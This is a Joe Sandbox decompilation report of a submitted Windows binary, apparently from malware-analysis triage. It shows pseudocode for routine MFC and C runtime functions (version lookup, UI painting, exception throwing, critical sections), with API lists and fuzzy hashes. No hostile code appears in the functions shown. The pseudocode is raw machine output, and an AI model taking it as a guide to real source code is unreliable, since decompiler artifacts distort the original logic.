                  Uniqueness Score: -1.00%

                  C-Code - Quality: 51%
                  			E0040791D(void* __ecx, void* __edi) {
                  				signed short _v16;
                  				signed short _v20;
                  				char _v24;
                  				void* __ebx;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t7;
                  				void* _t18;
                  				intOrPtr* _t19;
                  				void* _t24;
                  				signed int _t25;
                  
                  				_t7 =  *0x462630; // 0x50052
                  				_t32 = _t7 - 0xffffffff;
                  				if(_t7 != 0xffffffff) {
                  					return _t7;
                  				}
                  				_push(_t18);
                  				_push(_t24);
                  				_t19 = GetProcAddress(E00407887( *((intOrPtr*)( *((intOrPtr*)(E0041F363(_t18, __edi, _t24, _t32) + 0x78))))), "DllGetVersion");
                  				_t25 = 0x40000;
                  				if(_t19 != 0) {
                  					E00431160(__edi,  &_v24, 0, 0x14);
                  					_push( &_v24);
                  					_v24 = 0x14;
                  					if( *_t19() >= 0) {
                  						_t25 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
                  					}
                  				}
                  				 *0x462630 = _t25;
                  				return _t25;
                  			}

                  APIs
                    • Part of subcall function 00407887: GetModuleHandleA.KERNELBASE(?,?,0040EC76,InitCommonControlsEx,00000000,?,0040F54A,00080000,00008000,?,?,00412253,?,00080000,?,?), ref: 00407895
                    • Part of subcall function 00407887: LoadLibraryA.KERNEL32(?,?,0040EC76,InitCommonControlsEx,00000000,?,0040F54A,00080000,00008000,?,?,00412253,?,00080000,?,?), ref: 004078A5
                  • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00407946
                  • _memset.LIBCMT ref: 0040795F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressHandleLibraryLoadModuleProc_memset
                  • String ID: DllGetVersion
                  • API String ID: 3385804498-2861820592
                  • Opcode ID: 5b7453e76c9e1d6b03a6d0f12065e1bffe7dffcc9129257384b4349de2f1a944
                  • Instruction ID: cf96501d195ca623c68e994556f6f897d69701b656ef3401447b7e78654c536a
                  • Opcode Fuzzy Hash: 5b7453e76c9e1d6b03a6d0f12065e1bffe7dffcc9129257384b4349de2f1a944
                  • Instruction Fuzzy Hash: CEF03BB1D002155BE7509BFDD845B9B73E85B04754F110136FD10F3291E6B89D0487AA
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0041C884(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t23;
                  				intOrPtr* _t47;
                  				void* _t48;
                  				void* _t49;
                  
                  				_t49 = __eflags;
                  				E00431A9B(E0044BA0A, __ebx, __edi, __esi);
                  				E00423242(__ebx, _t48 - 0x14, __edi, __esi, _t49);
                  				_t47 =  *((intOrPtr*)(_t48 + 8));
                  				 *(_t48 - 4) =  *(_t48 - 4) & 0x00000000;
                  				_t23 = E00423194(_t47, _t48 - 0x14);
                  				 *((intOrPtr*)( *_t47 + 0x50))(_t48 - 0x24, GetSysColor(0xc));
                  				E0041B463(_t47,  *((intOrPtr*)(_t48 - 0x24)),  *((intOrPtr*)(_t48 - 0x20)),  *((intOrPtr*)(_t48 - 0x1c)) -  *((intOrPtr*)(_t48 - 0x24)),  *((intOrPtr*)(_t48 - 0x18)) -  *((intOrPtr*)(_t48 - 0x20)), 0xf00021);
                  				E00423194(_t47, _t23);
                  				 *(_t48 - 4) =  *(_t48 - 4) | 0xffffffff;
                  				 *((intOrPtr*)(_t48 - 0x14)) = 0x452f4c;
                  				E0040ADD4(__ebx, _t48 - 0x14, _t23, _t47, _t49);
                  				return E00431B73(1);
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041C889
                  • GetSysColor.USER32(0000000C), ref: 0041C890
                    • Part of subcall function 00423242: __EH_prolog3.LIBCMT ref: 00423249
                    • Part of subcall function 00423242: CreateSolidBrush.GDI32(?), ref: 00423264
                    • Part of subcall function 00423194: SelectObject.GDI32(?,00000000), ref: 004231BA
                    • Part of subcall function 00423194: SelectObject.GDI32(?,?), ref: 004231D0
                    • Part of subcall function 0041B463: PatBlt.GDI32(?,?,?,?,?,?), ref: 0041B47A
                    • Part of subcall function 0040ADD4: __EH_prolog3_catch_GS.LIBCMT ref: 0040ADDE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3ObjectSelect$BrushColorCreateH_prolog3_catch_Solid
                  • String ID: L/E
                  • API String ID: 1097662718-2456494276
                  • Opcode ID: e1a511be5031bb41064cd11203baab905edbaed639b95e56e1de4081b40d4594
                  • Instruction ID: 68ff83ec7e2eba05f79b04070f7d705b72ba532b61595986b3c127a4697d77d4
                  • Opcode Fuzzy Hash: e1a511be5031bb41064cd11203baab905edbaed639b95e56e1de4081b40d4594
                  • Instruction Fuzzy Hash: 76010872A001199BCB04EFE9C94AEEEB7F4AF08305F10415AF405B3191CB389E058BA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E0041FDA4(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, struct HWND__* _a4, intOrPtr _a8) {
                  				signed int _v8;
                  				char _v20;
                  				void* __esi;
                  				signed int _t7;
                  				signed int _t16;
                  				intOrPtr _t18;
                  				intOrPtr _t23;
                  				intOrPtr _t24;
                  				struct HWND__* _t25;
                  				signed int _t26;
                  
                  				_t24 = __edi;
                  				_t23 = __edx;
                  				_t18 = __ebx;
                  				_t7 =  *0x463404; // 0x38a11573
                  				_v8 = _t7 ^ _t26;
                  				_t25 = _a4;
                  				if(_t25 != 0) {
                  					if((GetWindowLongA(_t25, 0xfffffff0) & 0x0000000f) != _a8) {
                  						goto L1;
                  					} else {
                  						GetClassNameA(_t25,  &_v20, 0xa);
                  						_t16 = E0040D6F3( &_v20, "combobox");
                  						asm("sbb eax, eax");
                  						_t11 =  ~_t16 + 1;
                  					}
                  				} else {
                  					L1:
                  					_t11 = 0;
                  				}
                  				return E00430650(_t11, _t18, _v8 ^ _t26, _t23, _t24, _t25);
                  			}

                  APIs
                  • GetWindowLongA.USER32 ref: 0041FDC5
                  • GetClassNameA.USER32(?,?,0000000A), ref: 0041FDDA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClassLongNameWindow
                  • String ID: combobox
                  • API String ID: 1147815241-2240613097
                  • Opcode ID: 5f8404e49d7c1d98f1caf49a06be34272533ddeb7c7ecae2d52f1c27699438b6
                  • Instruction ID: 6153ddf1edffb141858314aed8e53acc64512b60bf2dcf25758a91ac4d9de857
                  • Opcode Fuzzy Hash: 5f8404e49d7c1d98f1caf49a06be34272533ddeb7c7ecae2d52f1c27699438b6
                  • Instruction Fuzzy Hash: 68F096326105196F8B01EFA49C45EBF77A8FB15315B50092AE812E7181DA38EA068699
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 50%
                  			E00401EB0(signed int _a4) {
                  				signed int _v8;
                  				char _v12;
                  				char _v16;
                  				char _v24;
                  				char _v28;
                  				intOrPtr _v32;
                  				signed int _t23;
                  				signed int _t24;
                  				signed int _t29;
                  				signed int _t30;
                  				signed int _t39;
                  				signed int _t42;
                  				intOrPtr* _t44;
                  				signed int _t46;
                  				signed int _t48;
                  				intOrPtr* _t51;
                  
                  				_t39 = _a4;
                  				if(_t39 > 0) {
                  					_t24 = _t23 | 0xffffffff;
                  					_t46 = _t24 % _t39;
                  					__eflags = _t24 / _t39 - 1;
                  					if(__eflags >= 0) {
                  						goto L2;
                  					} else {
                  						_a4 = 0;
                  						E00430B93( &_v12, _t46,  &_a4);
                  						_v16 = 0x44ee2c;
                  						_t29 = E00430CF4( &_v16, 0x45abf8);
                  						asm("int3");
                  						asm("int3");
                  						asm("int3");
                  						asm("int3");
                  						asm("int3");
                  						asm("int3");
                  						asm("int3");
                  						asm("int3");
                  						asm("int3");
                  						asm("int3");
                  						asm("int3");
                  						asm("int3");
                  						asm("int3");
                  						_t42 = _v8;
                  						__eflags = _t42;
                  						if(_t42 > 0) {
                  							_t30 = _t29 | 0xffffffff;
                  							_t48 = _t30 % _t42;
                  							__eflags = _t30 / _t42 - 2;
                  							if(__eflags >= 0) {
                  								goto L7;
                  							} else {
                  								_v8 = 0;
                  								E00430B93( &_v24, _t48,  &_v8);
                  								_t44 =  &_v28;
                  								_v28 = 0x44ee2c;
                  								E00430CF4(_t44, 0x45abf8);
                  								asm("int3");
                  								asm("int3");
                  								asm("int3");
                  								asm("int3");
                  								asm("int3");
                  								asm("int3");
                  								asm("int3");
                  								asm("int3");
                  								asm("int3");
                  								asm("int3");
                  								_t51 = _t44;
                  								E00430BE6(_t44, _t48, _v32);
                  								 *_t51 = 0x44ee2c;
                  								return _t51;
                  							}
                  						} else {
                  							_t42 = 0;
                  							__eflags = 0;
                  							L7:
                  							return E00404461(__eflags, _t42 + _t42);
                  						}
                  					}
                  				} else {
                  					_t39 = 0;
                  					L2:
                  					return E00404461(0, _t39);
                  				}
                  			}




















                  APIs
                  • std::exception::exception.LIBCMT ref: 00401EE7
                  • __CxxThrowException@8.LIBCMT ref: 00401EFE
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Exception@8Throw_mallocstd::exception::exception
                  • String ID: ,D
                  • API String ID: 4063778783-2732034087
                  • Opcode ID: f55c6ffad4fdc68b5f0d7580b16713416585db3234ee9596b3b0f9ed43f90067
                  • Instruction ID: 1c594be200a3db273ddcf6dcc8e3d269b8c78a2e612c611a6454ac4e5cd0e6b8
                  • Opcode Fuzzy Hash: f55c6ffad4fdc68b5f0d7580b16713416585db3234ee9596b3b0f9ed43f90067
                  • Instruction Fuzzy Hash: B0E0E5B050420066D30CDA61D951A2F72907BC0704F104F2EF91A411C1EB78D60C855B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E00435641(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                  				intOrPtr _t17;
                  				intOrPtr* _t28;
                  				void* _t29;
                  
                  				_t30 = __eflags;
                  				_t28 = __esi;
                  				_t27 = __edi;
                  				_t26 = __edx;
                  				_t19 = __ebx;
                  				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                  				E0043059E(__ebx, __edx, __edi, __esi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
                  				 *((intOrPtr*)(E00436178(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                  				_t17 = E00436178(_t19, _t26, _t27, _t30);
                  				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                  				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                  					_t17 =  *((intOrPtr*)(__esi + 0x14));
                  					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                  						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
                  							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
                  							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                  								_t17 = E00430577(_t37,  *((intOrPtr*)(_t28 + 0x18)));
                  								_t38 = _t17;
                  								if(_t17 != 0) {
                  									_push( *((intOrPtr*)(_t29 + 0x10)));
                  									_push(_t28);
                  									return E004353C6(_t38);
                  								}
                  							}
                  						}
                  					}
                  				}
                  				return _t17;
                  			}







                  APIs
                    • Part of subcall function 0043059E: __getptd.LIBCMT ref: 004305A4
                    • Part of subcall function 0043059E: __getptd.LIBCMT ref: 004305B4
                  • __getptd.LIBCMT ref: 00435650
                    • Part of subcall function 00436178: __getptd_noexit.LIBCMT ref: 0043617B
                    • Part of subcall function 00436178: __amsg_exit.LIBCMT ref: 00436188
                  • __getptd.LIBCMT ref: 0043565E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __getptd$__amsg_exit__getptd_noexit
                  • String ID: csm
                  • API String ID: 803148776-1018135373
                  • Opcode ID: 93b84b3fd083976a509b7a3d40727f0b67e2f8566414da68aa08ea54e0d22545
                  • Instruction ID: e998b73cdfcbc4847a3ed670d686110aca20351667a2c74c15cb2f3ab349f30f
                  • Opcode Fuzzy Hash: 93b84b3fd083976a509b7a3d40727f0b67e2f8566414da68aa08ea54e0d22545
                  • Instruction Fuzzy Hash: 80018134801B059BCF34DF26C4426AEB7B5AF1C311F94642FE4495A3A2CB388990CF89
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 92%
                  			E0040F76D(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t15;
                  				intOrPtr* _t23;
                  				intOrPtr _t27;
                  				void* _t28;
                  
                  				_push(4);
                  				E00431A9B(E0044B36E, __ebx, __edi, __esi);
                  				_t27 = __ecx;
                  				 *((intOrPtr*)(_t28 - 0x10)) = __ecx;
                  				 *((intOrPtr*)(__ecx)) = 0x450e14;
                  				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
                  				if( *((intOrPtr*)(__ecx + 0x20)) != 0 && __ecx != 0x466348 && __ecx != 0x4663a0 && __ecx != 0x4663f8 && __ecx != 0x466450) {
                  					E0040F092(__ebx, __ecx);
                  				}
                  				_t23 =  *((intOrPtr*)(_t27 + 0x4c));
                  				if(_t23 != 0) {
                  					 *((intOrPtr*)( *_t23 + 4))(1);
                  				}
                  				_t15 =  *((intOrPtr*)(_t27 + 0x50));
                  				if(_t15 != 0 &&  *(_t15 + 0x28) == _t27) {
                  					 *(_t15 + 0x28) =  *(_t15 + 0x28) & 0x00000000;
                  				}
                  				 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
                  				return E00431B73(E004126F7(_t27));
                  			}








                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3
                  • String ID: HcF$PdF
                  • API String ID: 431132790-1855547554
                  • Opcode ID: 954c6daa274b624ccb132f90fb8015d634208a0bf4d08cf6dc5a681c79da50d4
                  • Instruction ID: 7e17d0bdb83c1bc18564c837a7577767b54507c0bb6134c2b92ef08d8e005f70
                  • Opcode Fuzzy Hash: 954c6daa274b624ccb132f90fb8015d634208a0bf4d08cf6dc5a681c79da50d4
                  • Instruction Fuzzy Hash: 7BF0F9359103108BDB34AB69814436EB2A0BF04719F11463FE85567BE1D7BC8CC4C68F
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 82%
                  			E00426219(void* __ecx, void* __esi, void* __eflags) {
                  				struct HINSTANCE__* _t9;
                  				_Unknown_base(*)()* _t12;
                  				void* _t14;
                  				void* _t17;
                  				_Unknown_base(*)()* _t19;
                  				void* _t20;
                  
                  				_push(0);
                  				E00431A9B(E0044C14C, _t14, _t17, __esi);
                  				if(( *0x4668dc & 0x00000001) == 0) {
                  					 *0x4668dc =  *0x4668dc | 0x00000001;
                  					 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
                  					_push("UxTheme.dll");
                  					 *0x4668d8 = E0040D5D6(_t14, __ecx, _t17, __esi,  *(_t20 - 4));
                  				}
                  				_t9 =  *0x4668d8; // 0x73310000
                  				_t19 =  *(_t20 + 0xc);
                  				if(_t9 != 0) {
                  					_t12 = GetProcAddress(_t9,  *(_t20 + 8));
                  					if(_t12 != 0) {
                  						_t19 = _t12;
                  					}
                  				}
                  				return E00431B73(_t19);
                  			}










                  APIs
                  • __EH_prolog3.LIBCMT ref: 00426220
                  • GetProcAddress.KERNEL32(73310000,?), ref: 00426259
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressH_prolog3Proc
                  • String ID: UxTheme.dll
                  • API String ID: 3325816569-352951104
                  • Opcode ID: a4a852b16d3f4d644eb00760bbfc3205726ab498dccf1a41d59192cb352b88aa
                  • Instruction ID: 93154bf1de3ba644c085273ccdfcc23c9d4ad52bd39bf1df4da4c0410343f817
                  • Opcode Fuzzy Hash: a4a852b16d3f4d644eb00760bbfc3205726ab498dccf1a41d59192cb352b88aa
                  • Instruction Fuzzy Hash: 14E06530A012649BDB11BF76AC0571937D8BB04715F46406BFC00E72A1EBB989408B7D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E0042282A(void* __ecx) {
                  				char _v8;
                  				intOrPtr* _v12;
                  				void* _t11;
                  
                  				_v8 = 0x466638;
                  				E00430CF4( &_v8, 0x45cfdc);
                  				asm("int3");
                  				return  *((intOrPtr*)( *_v12 + 4))(0, _t11, __ecx);
                  			}







                  APIs
                  • __CxxThrowException@8.LIBCMT ref: 00422840
                    • Part of subcall function 00430CF4: RaiseException.KERNEL32(?,?,?,?), ref: 00430D36
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ExceptionException@8RaiseThrow
                  • String ID: 8fF$8fF
                  • API String ID: 3976011213-2798571808
                  • Opcode ID: b981e969448221579f3da19129567584c7e0524e6b7c9e5e8841d6a8c252ee54
                  • Instruction ID: bcc99a705935aa0b096279d8265c82760203fa9d8db396da574b4737db60febc
                  • Opcode Fuzzy Hash: b981e969448221579f3da19129567584c7e0524e6b7c9e5e8841d6a8c252ee54
                  • Instruction Fuzzy Hash: D5D05B7514434CBFC304DBC9D459E8ABBADDBC8714F214156F61887641DBB1FD00C665
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 61%
                  			E004209F9(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
                  				signed int _v8;
                  				void* _t31;
                  				intOrPtr _t32;
                  				signed int _t38;
                  				struct _CRITICAL_SECTION* _t39;
                  				intOrPtr* _t44;
                  				long* _t47;
                  				intOrPtr* _t50;
                  
                  				_push(__ecx);
                  				_t50 = _a4;
                  				_t38 = 1;
                  				_t47 = __ecx;
                  				_v8 = 1;
                  				if( *((intOrPtr*)(_t50 + 8)) <= 1) {
                  					L10:
                  					_t24 =  &(_t47[7]); // 0x466584
                  					_t39 = _t24;
                  					EnterCriticalSection(_t39);
                  					_t25 =  &(_t47[5]); // 0x46657c
                  					E00420679(_t25, _t50);
                  					LeaveCriticalSection(_t39);
                  					LocalFree( *(_t50 + 0xc));
                  					 *((intOrPtr*)( *_t50))(1);
                  					_t31 = TlsSetValue( *_t47, 0);
                  					L11:
                  					return _t31;
                  				} else {
                  					goto L1;
                  				}
                  				do {
                  					L1:
                  					_t32 = _a8;
                  					if(_t32 == 0) {
                  						L5:
                  						_t44 =  *((intOrPtr*)( *(_t50 + 0xc) + _t38 * 4));
                  						if(_t44 != 0) {
                  							 *((intOrPtr*)( *_t44))(1);
                  						}
                  						_t31 =  *(_t50 + 0xc);
                  						 *(_t31 + _t38 * 4) =  *(_t31 + _t38 * 4) & 0x00000000;
                  						goto L8;
                  					}
                  					_t5 =  &(_t47[4]); // 0x7e0110
                  					if( *((intOrPtr*)( *_t5 + 4 + _t38 * 8)) == _t32) {
                  						goto L5;
                  					}
                  					_t31 =  *(_t50 + 0xc);
                  					if( *(_t31 + _t38 * 4) != 0) {
                  						_v8 = _v8 & 0x00000000;
                  					}
                  					L8:
                  					_t38 = _t38 + 1;
                  				} while (_t38 <  *((intOrPtr*)(_t50 + 8)));
                  				if(_v8 == 0) {
                  					goto L11;
                  				}
                  				goto L10;
                  			}












                  APIs
                  • EnterCriticalSection.KERNEL32(00466584,00000000,00466568,00466584,00466568,?,00420AD8,007F7A80,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF), ref: 00420A58
                  • LeaveCriticalSection.KERNEL32(00466584,00000000,?,00420AD8,007F7A80,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A68
                  • LocalFree.KERNEL32(?,?,00420AD8,007F7A80,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A71
                  • TlsSetValue.KERNEL32(00466568,00000000,?,00420AD8,007F7A80,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A83
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterFreeLeaveLocalValue
                  • String ID:
                  • API String ID: 2949335588-0
                  • Opcode ID: bd4760c49065bc264e8e5b21d6b9a7af9dba21f9fb3e279cf7a4ce5c93557814
                  • Instruction ID: c67d59306e024ad0e16bde5a0a6ba0c27b3e8643983254bc6767e2b362cbf32f
                  • Opcode Fuzzy Hash: bd4760c49065bc264e8e5b21d6b9a7af9dba21f9fb3e279cf7a4ce5c93557814
                  • Instruction Fuzzy Hash: B0116735600314EFD724CF59E884F5AB7E8FF55315F90806AE546876A2CBB4EC50CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00424385(signed int _a4) {
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				struct _CRITICAL_SECTION* _t4;
                  				void* _t7;
                  				void* _t9;
                  				signed int _t10;
                  				void* _t13;
                  				intOrPtr* _t14;
                  
                  				_t10 = _a4;
                  				_t15 = _t10 - 0x11;
                  				if(_t10 >= 0x11) {
                  					_t4 = E00406436(_t7, _t9, _t10, _t13, _t15);
                  				}
                  				if( *0x4666dc == 0) {
                  					_t4 = E0042431C();
                  				}
                  				_t14 = 0x466890 + _t10 * 4;
                  				if( *_t14 == 0) {
                  					EnterCriticalSection(0x466878);
                  					if( *_t14 == 0) {
                  						_t4 = 0x4666e0 + _t10 * 0x18;
                  						InitializeCriticalSection(_t4);
                  						 *_t14 =  *_t14 + 1;
                  					}
                  					LeaveCriticalSection(0x466878);
                  				}
                  				EnterCriticalSection(0x4666e0 + _t10 * 0x18);
                  				return _t4;
                  			}














                  APIs
                  • EnterCriticalSection.KERNEL32(00466878,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243BF
                  • InitializeCriticalSection.KERNEL32(-0006028E,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243D1
                  • LeaveCriticalSection.KERNEL32(00466878,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243DE
                  • EnterCriticalSection.KERNEL32(-0006028E,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243EE
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                  • String ID:
                  • API String ID: 2895727460-0
                  • Opcode ID: dfab13008bdaf96ebf00f0eb18ec2ef9bb80e0054cfda95d03d59bec202288f4
                  • Instruction ID: 12cf9614eb4c710b7d9bc39edca722b45593c528368f68ea10bc041c1aee9ecf
                  • Opcode Fuzzy Hash: dfab13008bdaf96ebf00f0eb18ec2ef9bb80e0054cfda95d03d59bec202288f4
                  • Instruction Fuzzy Hash: 30F0C272301124AFDB106B5AFC45B1DB769FBD1355F520037F54083151EBB898408AAE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0042055C(long* __ecx, signed int _a4) {
                  				void* _t9;
                  				struct _CRITICAL_SECTION* _t12;
                  				signed int _t14;
                  				long* _t16;
                  
                  				_t16 = __ecx;
                  				_t1 =  &(_t16[7]); // 0x466584
                  				_t12 = _t1;
                  				EnterCriticalSection(_t12);
                  				_t14 = _a4;
                  				if(_t14 <= 0) {
                  					L5:
                  					LeaveCriticalSection(_t12);
                  					return 0;
                  				}
                  				_t3 =  &(_t16[3]); // 0x3
                  				if(_t14 >=  *_t3) {
                  					goto L5;
                  				}
                  				_t9 = TlsGetValue( *_t16);
                  				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
                  					goto L5;
                  				} else {
                  					LeaveCriticalSection(_t12);
                  					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
                  				}
                  			}








                  APIs
                  • EnterCriticalSection.KERNEL32(00466584,?,?,?,?,00420B53,?,00000004,0041F372,00406452,00411FA3), ref: 0042056A
                  • TlsGetValue.KERNEL32(00466568,?,?,?,?,00420B53,?,00000004,0041F372,00406452,00411FA3), ref: 0042057E
